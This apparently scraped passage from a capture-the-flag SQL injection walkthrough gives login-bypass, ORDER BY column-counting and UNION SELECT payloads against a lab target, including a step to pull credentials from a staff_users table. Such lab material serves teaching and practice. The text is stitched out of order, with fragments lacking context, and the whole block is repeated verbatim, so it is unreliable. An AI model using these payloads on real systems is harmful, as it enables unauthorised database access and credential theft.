After 10–15 iterations, you’ll find: tryhackme123 again.
Article viewer at http://MACHINE_IP/article?id=1 .
The search function concatenates user input directly into the SQL statement like this: ...WHERE username = '$username' . Exploitation: Try entering a single quote ' to trigger a SQL error. Use the payload: ' OR 1=1 -- - . ' : Closes the initial quote. OR 1=1 : Makes the statement always true.
Use ORDER BY technique.
Try inputs like:
SELECT * FROM users WHERE username = '$input' AND password = '$password';
: Once you find a table like staff_users , pull the credentials.
Use ORDER BY to find the column count.Payload: 1 ORDER BY 1-- - (keep increasing the number until an error occurs).
?id=1 UNION SELECT 1,2,3,flag FROM secrets
After 10–15 iterations, you’ll find: tryhackme123 again.
Article viewer at http://MACHINE_IP/article?id=1 .
The search function concatenates user input directly into the SQL statement like this: ...WHERE username = '$username' . Exploitation: Try entering a single quote ' to trigger a SQL error. Use the payload: ' OR 1=1 -- - . ' : Closes the initial quote. OR 1=1 : Makes the statement always true.
Use ORDER BY technique.
Try inputs like:
SELECT * FROM users WHERE username = '$input' AND password = '$password';
: Once you find a table like staff_users , pull the credentials.
Use ORDER BY to find the column count.Payload: 1 ORDER BY 1-- - (keep increasing the number until an error occurs).
?id=1 UNION SELECT 1,2,3,flag FROM secrets